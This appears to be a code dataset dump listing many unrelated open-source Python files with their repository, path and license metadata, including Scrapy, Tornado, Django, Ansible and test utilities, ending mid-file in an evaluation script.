code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
---|---|---|---|---|---|
import time
from collections import defaultdict
from unittest import TextTestRunner, TextTestResult as _TextTestResult
from scrapy.commands import ScrapyCommand
from scrapy.contracts import ContractsManager
from scrapy.utils.misc import load_object, set_environ
from scrapy.utils.conf import build_component_list
class TextTestResult(_TextTestResult):
def printSummary(self, start, stop):
write = self.stream.write
writeln = self.stream.writeln
run = self.testsRun
plural = "s" if run != 1 else ""
writeln(self.separator2)
writeln("Ran %d contract%s in %.3fs" % (run, plural, stop - start))
writeln()
infos = []
if not self.wasSuccessful():
write("FAILED")
failed, errored = map(len, (self.failures, self.errors))
if failed:
infos.append("failures=%d" % failed)
if errored:
infos.append("errors=%d" % errored)
else:
write("OK")
if infos:
writeln(" (%s)" % (", ".join(infos),))
else:
write("\n")
class Command(ScrapyCommand):
requires_project = True
default_settings = {'LOG_ENABLED': False}
def syntax(self):
return "[options] <spider>"
def short_desc(self):
return "Check spider contracts"
def add_options(self, parser):
ScrapyCommand.add_options(self, parser)
parser.add_option("-l", "--list", dest="list", action="store_true",
help="only list contracts, without checking them")
parser.add_option("-v", "--verbose", dest="verbose", default=False, action='store_true',
help="print contract tests for all spiders")
def run(self, args, opts):
# load contracts
contracts = build_component_list(self.settings.getwithbase('SPIDER_CONTRACTS'))
conman = ContractsManager(load_object(c) for c in contracts)
runner = TextTestRunner(verbosity=2 if opts.verbose else 1)
result = TextTestResult(runner.stream, runner.descriptions, runner.verbosity)
# contract requests
contract_reqs = defaultdict(list)
spider_loader = self.crawler_process.spider_loader
with set_environ(SCRAPY_CHECK='true'):
for spidername in args or spider_loader.list():
spidercls = spider_loader.load(spidername)
spidercls.start_requests = lambda s: conman.from_spider(s, result)
tested_methods = conman.tested_methods_from_spidercls(spidercls)
if opts.list:
for method in tested_methods:
contract_reqs[spidercls.name].append(method)
elif tested_methods:
self.crawler_process.crawl(spidercls)
# start checks
if opts.list:
for spider, methods in sorted(contract_reqs.items()):
if not methods and not opts.verbose:
continue
print(spider)
for method in sorted(methods):
print(' * %s' % method)
else:
start = time.time()
self.crawler_process.start()
stop = time.time()
result.printErrors()
result.printSummary(start, stop)
self.exitcode = int(not result.wasSuccessful())
| eLRuLL/scrapy | scrapy/commands/check.py | Python | bsd-3-clause | 3,403 |
from .rule_base import RuleBase
class RuleChildren(RuleBase):
""" rule = rule_children( parser, rule, next_rule )
rule_children constructor. Pass in the parser object that the rule is for, the rule
that is being parsed, and the next rule in the parsing chain.
This class takes as input a list of parser classes to be matched against the string
being parsed. During parsing, it will attempt to fit any of the child parsers (in
any order) against the string being parsed. After each match, the matched contents
will be removed and parsing will start again. This repeats until no more matches
can be found.
keys for the rules dictionary:
========= ========
key contents
========= ========
name The name of the rule
classes A list with classes to be matched
optional (optional) If true, denotes that this rule is optional
========= ========
:param parser: The parser that this rule belongs to
:param rule: A dictionary representing the rule configuration (see each rule class for details)
:param next_rule: A dictionary representing the next rule
:type parser: parser
:type rule: dict
:type next_rule: dict
:returns: rule object
"""
require_value = False
classes = []
def __init__(self, parser, rule, next_rule):
super().__init__(parser, rule, next_rule)
if not 'classes' in self.rule:
raise ValueError('Missing classes for children rule %s in %s' % (rule, self.parser_class))
if not self.rule['classes']:
raise ValueError('Missing classes for children rule %s in %s' % (rule, self.parser_class))
self.classes = self.rule['classes']
def parse(self, string):
matches = []
# we need to keep looping through the children looking for matches
# to the string until we no longer get any matches. Then return.
c = 0
while string:
c += 1
if c > 1000:
raise ValueError('Max depth reached')
shortest_leftover = False
best_match = False
best_leftover = ''
current_string = string
for child in self.classes:
# let the child parse the string
child_parser = child()
leftover = child_parser.parse(current_string)
# if it didn't do anything then this child didn't match
if not child_parser.matched:
continue
# It is possible that more than one child matches. If so,
# prioritize the child that matches the largest part of the
# string. All else being equal, first come first serve
if best_match:
if len(leftover) < shortest_leftover:
shortest_leftover = len(leftover)
best_match = child_parser
best_leftover = leftover
else:
shortest_leftover = len(leftover)
best_match = child_parser
best_leftover = leftover
# we have a match!
if best_match:
string = best_leftover
matches.append(best_match)
# If we didn't find anything then we are completely done
else:
if matches:
self.leftovers = string
self.result = matches
return True
else:
self.leftovers = string
self.result = ''
return False
# the only way we would get here is if we matched the entire string
self.leftovers = ''
self.result = matches
return True
| cmancone/mygrations | mygrations/core/parse/rule_children.py | Python | mit | 3,841 |
# -*- coding: utf-8 -*-
from tests import HangulizeTestCase
from hangulize.langs.isl import Icelandic
class IcelandicTestCase(HangulizeTestCase):
lang = Icelandic()
def test_people(self):
self.assert_examples({
'Agnar Helgason': '아그나르 헬가손',
'Ágústa Eva Erlendsdóttir': '아우구스타 에바 에를렌스도티르',
'Albert Guðmundsson': '알베르트 그뷔드뮌손',
'Ari Þorgilsson': '아리 소르길손',
'Arnaldur Indriðason': '아르드날뒤르 인드리다손',
'Árni Magnússon': '아우르드니 마그누손',
'Árni Sigfússon': '아우르드니 시그푸손',
'Ásgeir Ásgeirsson': '아우스게이르 아우스게이르손',
'Ásgeir Helgason': '아우스게이르 헬가손',
'Ásgeir Sigurvinsson': '아우스게이르 시귀르빈손',
'Ásmundur Sveinsson': '아우스뮌뒤르 스베인손',
'Baltasar Kormákur': '발타사르 코르마우퀴르',
'Björgólfur Guðmundsson': '비외르골뷔르 그뷔드뮌손',
'Björgólfur Thor Björgólfsson': '비외르골뷔르 소르 비외르골프손',
'Björgvin Halldórsson': '비외르그빈 하들도르손',
'Björk Guðmundsdóttir': '비외르크 그뷔드뮌스도티르',
'Björn Bjarnason': '비외르든 비아르드나손',
'Björn Hlynur Haraldsson': '비외르든 흘리뉘르 하랄손',
'Bragi Ólafsson': '브라이이 올라프손',
'Davíð Oddsson': '다비드 오드손',
'Davíð Stefánsson': '다비드 스테파운손',
'Eggert Pálsson': '에게르트 파울손',
'Eiður Smári Guðjohnsen': '에이뒤르 스마우리 그뷔드요흔센',
'Einar Bárðarson': '에이나르 바우르다르손',
'Einar Benediktsson': '에이나르 베네딕츠손',
'Einar Hákonarson': '에이나르 하우코나르손',
'Einar Hjörleifsson Kvaran': '에이나르 혜르들레이프손 크바란',
'Einar Jónsson': '에이나르 욘손',
'Einar Kárason': '에이나르 카우라손',
'Einar Már Guðmundsson': '에이나르 마우르 그뷔드뮌손',
'Einar Örn Benediktsson': '에이나르 외르든 베네딕츠손',
'Eiríkur rauði': '에이리퀴르 뢰이디',
'Eiríkur Hauksson': '에이리퀴르 회익손',
'Emilíana Torrini Davíðsdóttir': '에밀리아나 토리니 다비스도티르',
'Freydís Eiríksdóttir': '프레이디스 에이릭스도티르',
'Friðrik Ólafsson': '프리드리크 올라프손',
'Friðrik Þór Friðriksson': '프리드리크 소르 프리드릭손',
'Garðar': '가르다르',
'Geir Hilmar': '게이르 힐마르',
'Gisli Gudjonsson': '기슬리 그뷔드욘손',
'Gísli Örn Garðarsson': '기슬리 외르든 가르다르손',
'Gísli Pálsson': '기슬리 파울손',
'Guðmundur Arason': '그뷔드뮌뒤르 아라손',
'Guðmundur Hagalín': '그뷔드뮌뒤르 하갈린',
'Guðríður Þorbjarnardóttir': '그뷔드리뒤르 소르비아르드나르도티르',
'Gunnfríður Jónsdóttir': '귄프리뒤르 욘스도티르',
'Hafdís Huld': '하프디스 휠드',
'Halldór Ásgrímsson': '하들도르 아우스그림손',
'Halldór Blöndal': '하들도르 블뢴달',
'Halldór Kiljan Laxness': '하들도르 킬리안 락스네스',
'Hallgrímur Helgason': '하들그리뮈르 헬가손',
'Hannes Hafstein': '한네스 하프스테인',
'Hannes Hólmsteinn Gissurarson': '한네스 홀름스테이든 기쉬라르손',
'Hannibal Valdimarsson': '한니발 발디마르손',
'Haukur Tómasson': '회이퀴르 토마손',
'Heiðar Helguson': '헤이다르 헬귀손',
'Helgi Valdimarsson': '헬기 발디마르손',
'Hermann Hreiðarsson': '헤르만 흐레이다르손',
'Hilmar Örn Hilmarsson': '힐마르 외르든 힐마르손',
'Hilmir Snær Guðnason': '힐미르 스나이르 그뷔드나손',
'Hólmfríður Karlsdóttir': '홀름프리뒤르 카르들스도티르',
'Hrafn Gunnlaugsson': '흐라픈 귄뢰익손',
'Hreiðar Már Sigurðsson': '흐레이다르 마우르 시귀르손',
'Ingólfur Arnarson': '잉골뷔르 아르드나르손',
'Ísleifur Gissurarson': '이슬레이뷔르 기쉬라르손',
'Ívar Ingimarsson': '이바르 잉기마르손',
'Jóhanna Sigurðardóttir': '요한나 시귀르다르도티르',
'Jóhannes Karl Gudjonsson': '요한네스 카르들 그뷔드욘손',
'Jóhannes úr Kötlum': '요한네스 우르 쾨틀륌',
'Jón Ásgeir Jóhannesson': '욘 아우스게이르 요한네손',
'Jón Baldvin Hannibalsson': '욘 발드빈 한니발손',
'Jón Kalman Stefánsson': '욘 칼만 스테파운손',
'Jón Leifs': '욘 레이프스',
'Jón Loftsson': '욘 로프츠손',
'Jón Páll Sigmarsson': '욘 파우들 시그마르손',
'Jón Sigurðsson': '욘 시귀르손',
'Jón Thoroddsen': '욘 소로드센',
'Jónas Hallgrímsson': '요나스 하들그림손',
'Kári Stefánsson': '카우리 스테파운손',
'Kjartan Ólafsson': '캬르탄 올라프손',
'Kolbeinn Tumason': '콜베이든 튀마손',
'Kristín Marja Baldursdóttir': '크리스틴 마리아 발뒤르스도티르',
'Kristján Eldjárn': '크리스티아운 엘디아우르든',
'Leifur Eiríksson': '레이뷔르 에이릭손',
'Linda Pétursdóttir': '린다 피에튀르스도티르',
'Loftur Sæmundsson': '로프튀르 사이뮌손',
'Magnús Magnússon': '마그누스 마그누손',
'Magnús Þorsteinsson': '마그누스 소르스테인손',
'Magnús Ver Magnússon': '마그누스 베르 마그누손',
'Margrét Hermanns Auðardóttir': '마르그리에트 헤르만스 외이다르도티르',
'Margrét Vilhjálmsdóttir': '마르그리에트 빌햐울름스도티르',
'Markús Örn Antonsson': '마르쿠스 외르든 안톤손',
'Mugison': '뮈이이손',
'Nína Dögg Filippusdóttir': '니나 되그 필리퓌스도티르',
'Ólafur Darri Ólafsson': '올라뷔르 다리 올라프손',
'Ólafur Egill Ólafsson': '올라뷔르 에이이들 올라프손',
'Ólafur Jóhann Ólafsson': '올라뷔르 요한 올라프손',
'Ólafur Ragnar Grímsson': '올라뷔르 라그나르 그림손',
'Örvar Þóreyjarson Smárason': '외르바르 소레이야르손 스마우라손',
'Páll Skúlason': '파우들 스쿨라손',
'Ragnar Bjarnason': '라그나르 비아르드나손',
'Ragnar Bragason': '라그나르 브라가손',
'Ragnheiður Gröndal': '라근헤이뒤르 그뢴달',
'Silvía Nótt': '실비아 노트',
'Sigurður Helgason': '시귀르뒤르 헬가손',
'Sigurður Nordal': '시귀르뒤르 노르달',
'Sigurður Þórarinsson': '시귀르뒤르 소라린손',
'Sjón': '숀',
'Snorri Hjartarson': '스노리 햐르타르손',
'Snorri Sturluson': '스노리 스튀르들뤼손',
'Steingrímur Hermannsson': '스테잉그리뮈르 헤르만손',
'Steinunn Sigurðardóttir': '스테이뉜 시귀르다르도티르',
'Stefán Guðmundur Guðmundsson': '스테파운 그뷔드뮌뒤르 그뷔드뮌손',
'Sveinn Björnsson': '스베이든 비외르든손',
'Þóra Magnúsdóttir': '소라 마그누스도티르',
'Þórarinn Eldjárn': '소라린 엘디아우르든',
'Þórbergur Þórðarson': '소르베르귀르 소르다르손',
'Þorfinnur Karlsefni': '소르핀뉘르 카르들세프니',
'Þorgeirr Þorkelsson Ljósvetningagoði': '소르게이르 소르켈손 리오스베트닝가고디',
'Thorkell Atlason': '소르케들 아틀라손',
'Þorsteinn Gylfason': '소르스테이든 길바손',
'Þorsteinn Pálsson': '소르스테이든 파울손',
'Þorvaldur Eiríksson': '소르발뒤르 에이릭손',
'Tinna Gunnlaugsdóttir': '틴나 귄뢰익스도티르',
'Tómas Guðmundsson': '토마스 그뷔드뮌손',
'Unnur Birna Vilhjálmsdóttir': '윈뉘르 비르드나 빌햐울름스도티르',
'Vala Flosadottir': '발라 플로사도티르',
'Vigdís Finnbogadóttir': '비그디스 핀보가도티르',
'Vigdís Grímsdóttir': '비그디스 그림스도티르',
'Viktor Arnar Ingólfsson': '빅토르 아르드나르 잉골프손',
'Vilhjálmur Árnason': '빌햐울뮈르 아우르드나손',
'Vilhjálmur Stefánsson': '빌햐울뮈르 스테파운손',
})
def test_places(self):
self.assert_examples({
'Akranes': '아크라네스',
'Akureyri': '아퀴레이리',
'Blöndós': '블뢴도스',
'Bolungarvík': '볼룽가르비크',
'Borgafjörður': '보르가피외르뒤르',
'Borganes': '보르가네스',
'Dalvík': '달비크',
'Djúpivogur': '디우피보귀르',
'Egilsstaðir': '에이일스타디르',
'Eyjafjallajökull': '에이야피아들라예퀴들',
'Goðafoss': '고다포스',
'Grímsey': '그림세이',
'Grindavík': '그린다비크',
'Hafnarfjörður': '하프나르피외르뒤르',
'Höfn í Hornafirði': '회픈 이 호르드나피르디',
'Hofsjökull': '호프스예퀴들',
'Hólmavík': '홀마비크',
'Húsavík': '후사비크',
'Hvammstangi': '크밤스타웅기',
'Hvíta': '크비타',
'Hvolsvöllur': '크볼스뵈들뤼르',
'Ísafjörður': '이사피외르뒤르',
'Keflavík': '케플라비크',
'Kópavogur': '코파보귀르',
'Lagarfljólt': '라가르플리올트',
'Langjökull': '라웅그예퀴들',
'Mosfellsbær': '모스펠스바이르',
'Mýrdalsjökull': '미르달스예퀴들',
'Mývatn': '미바튼',
'Neskaupstaður': '네스쾨이프스타뒤르',
'Njarðvík': '니아르드비크',
'Ólafsfjörður': '올라프스피외르뒤르',
'Ólafsvík': '올라프스비크',
'Raufarhöfn': '뢰이바르회픈',
'Reykjanes': '레이캬네스',
'Reykjavík': '레이캬비크',
'Sauðárkrókur': '쇠이다우르크로퀴르',
'Selfoss': '셀포스',
'Seyðisfjörður': '세이디스피외르뒤르',
'Siglufjörður': '시글뤼피외르뒤르',
'Skjálfandafljót': '스캬울반다플리오트',
'Stykkishólmur': '스티키스홀뮈르',
'Surtsey': '쉬르트세이',
'Vatnajökull': '바트나예퀴들',
'Vík': '비크',
'Vopnafjörður': '보프나피외르뒤르',
'Þingvellir': '싱그베들리르',
'Þjórsá': '시오르사우',
'Þórisvatn': '소리스바튼',
'Þorlákshöfn': '소를라욱스회픈',
'Þórshöfn': '소르스회픈',
}) | Jinwithyoo/han | tests/isl.py | Python | bsd-3-clause | 12,082 |
from dock import client
def fmt(container):
image, name = ns(container)
return '[{image}/{name}]'.format(image=image, name=name)
def ns(container):
image_name = container.attrs['Image']
image = client.images.get(image_name)
if len(image.tags) > 0:
image_name = image.tags[0].split(":")[0]
else:
image_name = image.short_id.split(":")[1]
image_name.replace('/', '-')
return image_name, container.name
def exposed_ports(container):
ports = container.attrs['Config']['ExposedPorts'].keys()
for port in ports:
port, protocol = port.split('/')[0], port.split('/')[1]
yield port, protocol
def exposes_ports(container):
return 'ExposedPorts' in container.attrs['Config'] | regiontog/macvlan-ipvs-dr | src/container.py | Python | mit | 778 |
import json
import logging
import pymongo
from bson.objectid import ObjectId
from tornado import gen
from tornado.ioloop import IOLoop
from tornado.web import RequestHandler, authenticated
from tornado.websocket import WebSocketHandler
from .conf import config
from .exceptions import LogsterException
logger = logging.getLogger('webapp')
class BaseHandler:
@property
def db(self):
return self.application.db
@property
def json_body(self):
if self.request.body:
return None
body = self.request.body.decode('utf-8')
return json.loads(body) if body else None
def get_current_user(self):
return self.get_secure_cookie('user')
class BaseRequestHandler(BaseHandler, RequestHandler):
pass
class BaseWebSocketHandler(BaseHandler, WebSocketHandler):
pass
class IndexHandler(BaseRequestHandler):
@gen.coroutine
@authenticated
def get(self):
self.render('index.html')
class LoginHandler(BaseRequestHandler):
def get(self):
self.render('login.html')
@gen.coroutine
def post(self):
username = self.get_argument('username')
password = self.get_argument('password')
success, error = yield self._authenticate_user(username, password)
if success:
self.set_secure_cookie('user', username)
self.redirect('/')
else:
self.render('login.html', error=error)
@gen.coroutine
def _authenticate_user(self, username, password):
user = yield self.db.users.find_one({'username': username})
if user is None:
return False, 'Login does not exist'
if user.get('password') != password:
return False, 'Password is invalid'
return True, None
class LogoutHandler(BaseRequestHandler):
@authenticated
def get(self):
self.clear_cookie('user')
self.redirect('/')
_web_socket_pool = {}
class ClientWebSocketHandler(BaseWebSocketHandler):
def check_origin(self, origin):
return True
def open(self):
user = self.get_secure_cookie('user')
logger.info('Authenticated user "%s" started websocket connection',
user)
self.log_name = self.get_argument('log')
IOLoop.current().spawn_callback(self._process_new_websocket)
@gen.coroutine
def _process_new_websocket(self):
try:
entries = yield self._get_initial_log_entries(self.log_name)
except LogsterException as e:
self.write_message(json.dumps({
'message_type': 'error',
'error': str(e)
}))
self.added = False
self.close()
return
self.write_message(json.dumps({
'message_type': 'new_entries',
'entries': entries
}))
if self.log_name not in _web_socket_pool:
_web_socket_pool[self.log_name] = []
_web_socket_pool[self.log_name].append(self)
self.added = True
logger.debug('Socket handler was added to the pool')
@gen.coroutine
def _get_initial_log_entries(self, log_name):
log = yield self.db.logs.find_one({
'name': log_name
})
if log is None:
raise LogsterException('Log is not found')
log_entries = yield self.db.entries.find({
'log': log['_id']
}).sort('order', pymongo.DESCENDING).limit(
config['app']['initialLineCount']).to_list(None)
return [{
'content': e['content'],
'order': e['order']
} for e in reversed(log_entries)]
def on_message(self, message):
pass
def on_close(self):
if not self.added:
return
_web_socket_pool[self.log_name].remove(self)
logger.debug('Socket handler was removed from the pool (token={})',
self.token)
# def send_message(self, msg):
# self.write_message(json.dumps({'message': msg}))
# logger.debug('Message was sent (token=%s, msg="%s")',
# self.token, msg)
class ScannerNotificationsHandler(BaseRequestHandler):
@gen.coroutine
def post(self):
if self.request.remote_ip != '127.0.0.1':
logger.info('Skip notifications from non-localhost (ipaddr=%s)',
self.request.remote_ip)
return
# Body format:
# {
# "log_id": "<ObjectId hexstr>",
# "entry_ids": ["<ObjectId hexstr>", ...]
# }
body = self.json_body
logger.info('Scanner notification received (body: %s)', body)
self.log = yield self.db.logs.find_one({
'_id': ObjectId(body['log_id'])
})
if self.log is None:
logger.info('Log is not found, cannot process notification '
'(log_id=%s)', body['log_id'])
return
log_name = self.log['name']
if log_name != config['app']['defaultLog']:
# don't receive notfications from other locations than default
logger.info('Skip notifications from non-default log '
'(log_name=%s)', log_name)
return
self.entries = yield self.db.entries.find({
'_id': {
'$in': [ObjectId(ent) for ent in body['entry_ids']]
}
}).sort('order').to_list(None)
websock_message = json.dumps(self._build_client_notif_message())
websockets = _web_socket_pool.get(log_name, [])
for handler in websockets:
handler.write_message(websock_message)
def _build_client_notif_message(self):
return {
'message_type': 'new_entries',
'entries': [{
'content': e['content'],
'order': e['order']
} for e in self.entries]
}
| irvind/logster | logster/handlers.py | Python | mit | 5,948 |
"""
This module allows you to mock the config file as needed.
A default fixture that simply returns a safe-to-modify copy of
the default value is provided.
This can be overridden by parametrizing over the option you wish to
mock.
e.g.
>>> @pytest.mark.parametrize("extension_initial_dot", (True, False))
... def test_fixture(mock_config, extension_initial_dot):
... import bids
... assert bids.config.get_option("extension_initial_dot") == extension_initial_dot
"""
from unittest.mock import patch
import pytest
@pytest.fixture
def config_paths():
import bids.config
return bids.config.get_option('config_paths').copy()
@pytest.fixture
def extension_initial_dot():
import bids.config
return bids.config.get_option('extension_initial_dot')
@pytest.fixture
def mock_config(config_paths, extension_initial_dot):
import bids.config
with patch.dict('bids.config._settings'):
bids.config._settings['config_paths'] = config_paths
bids.config._settings['extension_initial_dot'] = extension_initial_dot
yield
| INCF/pybids | bids/conftest.py | Python | mit | 1,063 |
"""pocimport URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('importing.urls', namespace='importing'))
]
| wbar/poc-import | src/pocimport/pocimport/urls.py | Python | mit | 823 |
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Example reboot device test with GDM + Mobly.
Usage:
python3 mobly_example_test.py -c ~/gazoo/testbeds/One-Somedevice.yml
See README.md for more details.
"""
import logging
import os
import sys
from typing import List
import gazoo_device
from mobly import asserts
from mobly import base_test
from mobly import test_runner
# If using a device controller from an extension package:
# import my_extension_package
# gazoo_device.register(my_extension_package)
_GAZOO_DEVICE_CONTROLLER = "GazooDevice"
class MoblyExampleRebootTest(base_test.BaseTestClass):
"""Example reboot device test with GDM + Mobly."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.manager = None
self.devices = []
def setup_class(self):
"""Creates a Manager instance."""
super().setup_class()
self.manager = gazoo_device.Manager(
log_directory=self.log_path,
gdm_log_file=os.path.join(self.log_path, "gdm.log"),
# Avoid log duplication with Mobly's stdout log handler
stdout_logging=False)
def teardown_class(self):
"""Closes the Manager instance."""
self.manager.close()
self.manager = None
super().teardown_class()
def setup_test(self):
"""Creates device controllers for all devices in the testbed."""
super().setup_test()
gazoo_device_names = self._get_gazoo_device_names()
self.devices = [self.manager.create_device(device_name)
for device_name in gazoo_device_names]
logging.info("Created devices for test: %s",
[device.name for device in self.devices])
def teardown_test(self):
"""Closes all device controllers."""
for device in self.devices:
device.close()
self.devices = []
super().teardown_test()
def _get_gazoo_device_names(self) -> List[str]:
"""Extracts names of Gazoo devices from the testbed.
Raises:
RuntimeError: If the testbed config does not contain any "GazooDevice"
controller entries.
Returns:
Names of all GazooDevices in the testbed.
"""
gazoo_device_configs = self.controller_configs.get(
_GAZOO_DEVICE_CONTROLLER, [])
gazoo_device_names = [config["id"] for config in gazoo_device_configs]
if not gazoo_device_names:
raise RuntimeError(
f"The testbed config does not have any {_GAZOO_DEVICE_CONTROLLER} "
"controller entries")
return gazoo_device_names
def test_reboot(self):
"""Reboots all devices in the testbed."""
for device in self.devices:
device.reboot()
asserts.assert_true(
device.connected,
f"Device {device.name} did not come back online after reboot")
if __name__ == "__main__":
test_runner.main()
| google/gazoo-device | examples/device_tests/mobly_example_test.py | Python | apache-2.0 | 3,325 |
"""Copyright 2009 Chris Davis
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
from django.conf.urls.defaults import *
urlpatterns = patterns('graphite.metrics.views',
('^index\.json$', 'index_json'),
('^search/?$', 'search_view'),
('^find/?$', 'find_view'),
('^expand/?$', 'expand_view'),
('^context/?$', 'context_view'),
('^get-metadata/?$', 'get_metadata_view'),
('^set-metadata/?$', 'set_metadata_view'),
('', 'find_view'),
)
| evernote/graphite-web | webapp/graphite/metrics/urls.py | Python | apache-2.0 | 941 |
#!/usr/bin/env python
'''
Copyright 2014 Nedim Srndic, University of Tuebingen
This file is part of Mimicus.
Mimicus is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Mimicus is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Mimicus. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
FC.py
Reproduction of scenario FC.
Created on March 5, 2014.
'''
from argparse import ArgumentParser
import sys
from common import attack_mimicry
def main():
# Parse command-line arguments
parser = ArgumentParser()
parser.add_argument('--plot', help='Where to save plot (file name)',
default=False)
args = parser.parse_args()
# Perform the attack
scenario_name = 'FC'
attack_mimicry(scenario_name, args.plot)
return 0
if __name__ == '__main__':
sys.exit(main())
| srndic/mimicus | reproduction/FC.py | Python | gpl-3.0 | 1,320 |
import requests
def before_scenario(context, scenario):
"""equivalent of unittest setUp"""
ip = "localhost"
port = "1234"
context.base_url = "http://" + ip + ":" + port
requests.delete(context.base_url + '/books', timeout=5)
def after_scenario(context, scenario):
"""equivalent of unittest tearDown"""
requests.delete(context.base_url + '/books', timeout=5)
| bpuderer/python_test | behave_demo/environment.py | Python | mit | 389 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Michael DeHaan <[email protected]>, and others
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: win_ping
version_added: "1.7"
short_description: A windows version of the classic ping module.
description:
- Checks management connectivity of a windows host
options:
data:
description:
- Alternate data to return instead of 'pong'
default: 'pong'
author: "Chris Church (@cchurch)"
'''
EXAMPLES = r'''
# Test connectivity to a windows host
# ansible winserver -m win_ping
# Example from an Ansible Playbook
- win_ping:
# Induce a crash to see what happens
- win_ping:
data: crash
'''
| dmitry-sobolev/ansible | lib/ansible/modules/windows/win_ping.py | Python | gpl-3.0 | 1,547 |
# -*- coding:utf-8 -*-
"""
Verion: 1.0
Author: zhangjian
Site: http://iliangqunru.com
File: __init__.py.py
Time: 2017/7/22 2:19
"""
| Xarrow/pySimulatedDNS | dnsCat/__init__.py | Python | apache-2.0 | 139 |
import unittest
# from gitbench.db import BenchmarkDB # FIXME: test is actually empty
class TestBenchmarkDB(unittest.TestCase):
test_path = '__test__.db'
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
if __name__ == '__main__':
import nose
nose.runmodule(argv=[__file__, '-vvs', '-x', '--pdb', '--pdb-failure'],
exit=False)
| cpcloud/vbench | vbench/tests/test_db.py | Python | mit | 430 |
# Copyright 2011 OpenStack LLC.
# Copyright 2011 Nebula, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneclient import base
class Group(base.Resource):
"""Represents an Identity user group.
Attributes:
* id: a uuid that identifies the group
* name: group name
* description: group description
"""
def update(self, name=None, description=None):
kwargs = {
'name': name if name is not None else self.name,
'description': (description
if description is not None
else self.description),
}
try:
retval = self.manager.update(self.id, **kwargs)
self = retval
except Exception:
retval = None
return retval
class GroupManager(base.CrudManager):
"""Manager class for manipulating Identity groups."""
resource_class = Group
collection_key = 'groups'
key = 'group'
def create(self, name, domain=None, description=None):
return super(GroupManager, self).create(
name=name,
domain_id=base.getid(domain),
description=description)
def list(self, user=None, **kwargs):
"""List groups.
If user is provided, then filter groups with
that attribute.
If ``**kwargs`` are provided, then filter groups with
attributes matching ``**kwargs``.
"""
if user:
base_url = '/users/%s' % base.getid(user)
else:
base_url = None
return super(GroupManager, self).list(
base_url=base_url,
**kwargs)
def get(self, group):
return super(GroupManager, self).get(
group_id=base.getid(group))
def update(self, group, name=None, description=None):
return super(GroupManager, self).update(
group_id=base.getid(group),
name=name,
description=description)
def delete(self, group):
return super(GroupManager, self).delete(
group_id=base.getid(group))
| ioram7/keystone-federado-pgid2013 | build/python-keystoneclient/keystoneclient/v3/groups.py | Python | apache-2.0 | 2,666 |
import argparse
import random
import editdistance
import os
import numpy as np
from data_generator import Tokenizer
from data_generator import get_data_generator
from model import get_model
def visualization(i, a, b, c, d, e, directory1):
with open(directory1 + '/' + str(i) + '.txt', 'w') as f:
a = a + ["EOS_X"]
c = c + ["EOS_Y"]
f.write(str(i) + ' ')
f.write(' '.join(a))
f.write('\n')
f.write('switch ')
f.write(' '.join(str(x[0]) for x in e))
f.write('\n')
for p, q in zip(c, d):
f.write(p + ' ')
f.write(' '.join(str(x) for x in q))
f.write('\n')
def evaluation(test_X, test_Y, prediction, attention, switch, act, fn):
id2act = {i: a for a, i in act.items()}
actions = []
for pred in prediction:
acts = []
for id in pred:
if id == 0:
break
acts.append(id2act[id])
actions.append(acts)
directory = fn + "/attention"
if not os.path.exists(directory):
os.makedirs(directory)
with open(fn + '/output.txt', 'w') as f:
for i, (a, b, c, d, e) in enumerate(zip(test_X, test_Y, actions, attention, switch)):
ed = editdistance.eval(b, c)
wer = ed / float(len(b))
f.write(str(i) + '\t')
f.write(str(len(b)) + '\t')
